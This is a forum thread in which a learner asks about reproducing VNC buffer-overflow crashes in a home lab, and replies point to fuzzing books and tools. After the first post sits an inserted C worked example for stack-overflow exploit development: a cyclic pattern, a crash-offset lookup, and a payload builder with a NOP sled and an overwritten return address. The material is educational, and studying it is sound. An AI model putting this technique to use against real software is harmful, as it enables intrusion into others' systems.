
Thread: Help with fuzzing

  1. #1
    Junior Member
    Join Date
    Nov 2007
    Posts
    37

    Help with fuzzing

    I'm trying to learn up on the topic of fuzzing. I'm using VMware Workstation for the BackTrack 3 and unpatched XP SP1 boxes. What I'm trying to do is the UltraVNC 1.0.1 buffer overflow and the RealVNC 3.3.7 buffer overflow. Basically, when I set up the exploit on BackTrack and then attempt to connect to it from the XP box, all that happens is the program crashes in both cases (Ultra and Real). I attempted to look at the crash in OllyDbg but to little avail. What I would like to do is recreate the crash manually, find a place for shellcode, and tell the program to jump to the shellcode. I appreciate any help that you're willing to give. I'm basically just trying to recreate the buffer overflow to better understand how it all works. Thanks again for all your help.
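
The three steps the post above asks about (reproduce the crash, find where the overwrite lands, redirect execution to the shellcode), as an added worked example in C. This is not code from the thread and does not target the UltraVNC or RealVNC bugs: the stack frame is a constructed struct standing in for the vulnerable function's frame, the cyclic pattern follows the familiar Metasploit pattern_create/pattern_offset layout but is reimplemented here, a 32-bit little-endian target is assumed, and the return address and the single INT3 (0xCC) payload are placeholders.

```c
/* Added example, not from the thread. Models in miniature the procedure of
 * crashing a stack-overflow target with a cyclic pattern, turning the bytes
 * that land in the saved return address (the EIP value OllyDbg shows at the
 * crash) into a buffer offset, and laying out a payload that puts a return
 * address at that offset with a NOP sled and payload in front of it.
 * Assumptions: 32-bit little-endian target; "Aa0Aa1..." pattern layout. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PATTERN_MAX 20280 /* 26*26*10 triplets * 3 bytes: all 4-byte windows unique */

/* Fill out[] with len bytes of the cyclic pattern "Aa0Aa1Aa2...Az9Ba0...". */
void pattern_create(char *out, size_t len)
{
    size_t pos = 0;
    for (char u = 'A'; u <= 'Z' && pos < len; u++)
        for (char l = 'a'; l <= 'z' && pos < len; l++)
            for (char d = '0'; d <= '9' && pos < len; d++) {
                const char trip[3] = { u, l, d };
                for (int i = 0; i < 3 && pos < len; i++)
                    out[pos++] = trip[i];
            }
}

/* Map the 32-bit value seen in EIP at the crash back to the byte offset in a
 * len-byte pattern where those 4 bytes started; -1 if they are not present. */
long pattern_offset(uint32_t eip, size_t len)
{
    static char pat[PATTERN_MAX];
    if (len > sizeof pat) len = sizeof pat;
    pattern_create(pat, len);
    /* EIP is loaded little-endian, so the lowest byte was first in memory. */
    const char needle[4] = { (char)(eip & 0xff), (char)(eip >> 8 & 0xff),
                             (char)(eip >> 16 & 0xff), (char)(eip >> 24 & 0xff) };
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Constructed stand-in for the vulnerable function's stack frame: a fixed
 * buffer immediately followed by the saved return address. */
struct frame {
    char buf[64];
    uint32_t saved_eip;
};

/* Simulate the unchecked copy (think strcpy() into buf). The copy is capped at
 * the struct size only so this demo does not smash its own stack; the spill
 * from buf into saved_eip is the bug being modelled. */
uint32_t simulate_overflow(const char *input, size_t len)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    if (len > sizeof f) len = sizeof f;
    memcpy(&f, input, len);
    return f.saved_eip;
}

/* Steps 1 and 2: crash with the pattern, turn the EIP value into the offset. */
long find_crash_offset(void)
{
    char pat[200];
    pattern_create(pat, sizeof pat);
    uint32_t eip = simulate_overflow(pat, sizeof pat);
    return pattern_offset(eip, sizeof pat); /* 64 for the frame above */
}

/* Step 3: build the real buffer: NOP sled, payload at the end of the sled,
 * return address at the measured offset. ret must point into the sled (the
 * buffer's own stack address, or an address reached through a jmp esp in a
 * DLL that does not move); finding it is target-specific and assumed here.
 * Returns the total length, or 0 if the payload does not fit before ret. */
size_t build_payload(uint8_t *out, size_t outlen, size_t offset, uint32_t ret,
                     const uint8_t *payload, size_t paylen)
{
    if (paylen > offset || offset + 4 > outlen) return 0;
    memset(out, 0x90, offset);                       /* NOP sled */
    memcpy(out + offset - paylen, payload, paylen);  /* payload just before ret */
    out[offset + 0] = (uint8_t)(ret & 0xff);         /* ret, little-endian */
    out[offset + 1] = (uint8_t)(ret >> 8 & 0xff);
    out[offset + 2] = (uint8_t)(ret >> 16 & 0xff);
    out[offset + 3] = (uint8_t)(ret >> 24 & 0xff);
    return offset + 4;
}
```

Against a real target the struct copy is replaced by sending the pattern over the network, the EIP value is read off the debugger at the crash and passed to pattern_offset(), and the first payload sent is a single INT3 (0xCC) so the debugger breaks when control lands in the sled; only then is it swapped for real shellcode. The return address has to be found per target build, which is the practical reason the exploits are version- and OS-specific.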

  2. #2
    Junior Member
    Join Date
    Nov 2007
    Posts
    37


    bump......

  3. #3
    Very good friend of the forum hhmatt
    Join Date
    Jan 2010
    Posts
    660


    Quote Originally Posted by Tully
    I'm trying to learn up on the topic of fuzzing. I'm using VMware Workstation for the BackTrack 3 and unpatched XP SP1 boxes. What I'm trying to do is the UltraVNC 1.0.1 buffer overflow and the RealVNC 3.3.7 buffer overflow. Basically, when I set up the exploit on BackTrack and then attempt to connect to it from the XP box, all that happens is the program crashes in both cases (Ultra and Real). I attempted to look at the crash in OllyDbg but to little avail. What I would like to do is recreate the crash manually, find a place for shellcode, and tell the program to jump to the shellcode. I appreciate any help that you're willing to give. I'm basically just trying to recreate the buffer overflow to better understand how it all works. Thanks again for all your help.
    There's only 1 book that I know of that takes on the topic of fuzzing solely.

    http://www.amazon.com/Fuzzing-Brute-...9505672&sr=8-1

    I have just finished reading this book. It's easy to understand if you have a programming background. I can still say that I have a lot more to learn about fuzzing even after reading this book.

    Do you realize that those exploits are most likely version-specific AND operating-system-specific? Also, do you realize that you must be using UltraVNC in order to use the UltraVNC exploit, as the RealVNC exploit will most likely not work?

    Fuzzing is just part of the required knowledge in order to properly exploit programs. On top of that, you must know what to look for and how to write proper exploits for each program. It is a must to know how to program and to have a great understanding of any protocols your target is using, along with in-memory fuzzing and file fuzzing.

    Notice that it might be possible that the exploits you're trying to use have been purposely miscoded in order to keep skiddies from using them at will.

    There is no easy way to learn this so don't ask for it.

  4. #4
    Junior Member
    Join Date
    Nov 2007
    Posts
    37


    Thanks hhmatt81 for your time and input. I'll definitely give the book a read. And I have an understanding of how buffer overflows work and why; I'm just wanting to further my knowledge on the subject. Thanks again.

  5. #5
    Just burned his ISO
    Join Date
    Apr 2008
    Posts
    18

    fuzzing

    Go to Google, type in "fuzzing pdf", and you will find there is a very large volume of information that is available for viewing.

    It is free, so you won't necessarily have to buy a book from Amazon, and you can get it without the wait.

    This is a very useful way to get information on many subjects, as Google finds PDF files.

    The first search result is interesting; I can't post links yet as I am still a n00b.

  6. #6
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328


    portable w3af UI GTK !!
    http://rapidshare.com/files/10962865..._w3af.zip.html

    http://fusil.hachoir.org/trac

    WebInspect has a click fuzzer
    http://rmccurdy.com/scripts/videos/r...spect_hack.swf

    webscarab i use sometimes too

    some stuff you may not know about

  7. #7
    Member elazar
    Join Date
    Sep 2007
    Posts
    217


    Quote Originally Posted by hhmatt81
    There's only 1 book that I know of that takes on the topic of fuzzing solely.

    http://www.amazon.com/Fuzzing-Brute-...9505672&sr=8-1

    I have just finished reading this book. It's easy to understand if you have a programming background. I can still say that I have a lot more to learn about fuzzing even after reading this book.

    Do you realize that those exploits are most likely version-specific AND operating-system-specific? Also, do you realize that you must be using UltraVNC in order to use the UltraVNC exploit, as the RealVNC exploit will most likely not work?

    Fuzzing is just part of the required knowledge in order to properly exploit programs. On top of that, you must know what to look for and how to write proper exploits for each program. It is a must to know how to program and to have a great understanding of any protocols your target is using, along with in-memory fuzzing and file fuzzing.

    Notice that it might be possible that the exploits you're trying to use have been purposely miscoded in order to keep skiddies from using them at will.

    There is no easy way to learn this so don't ask for it.
    Though it's geared towards *nix, check out Jon Erickson's Hacking: The Art of Exploitation. http://www.amazon.com/Hacking-Art-Ex.../dp/1593271441
    dd if=/dev/urandom of=/mybrain

  8. #8
    Senior Member ShadowKill
    Join Date
    Dec 2007
    Posts
    908


    Jon kinda did these in reverse. The first edition was an "advanced" view of elite exploitation techniques using various overflows and network (wired/wireless) protocol/programming flaws. The second edition is a more in-depth view of, for instance, OOD (Object-Oriented Design) and language architectures. I'd recommend the first edition if you are looking into fuzzing, as the techniques shown in the book are exactly what fuzzing looks for.



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill
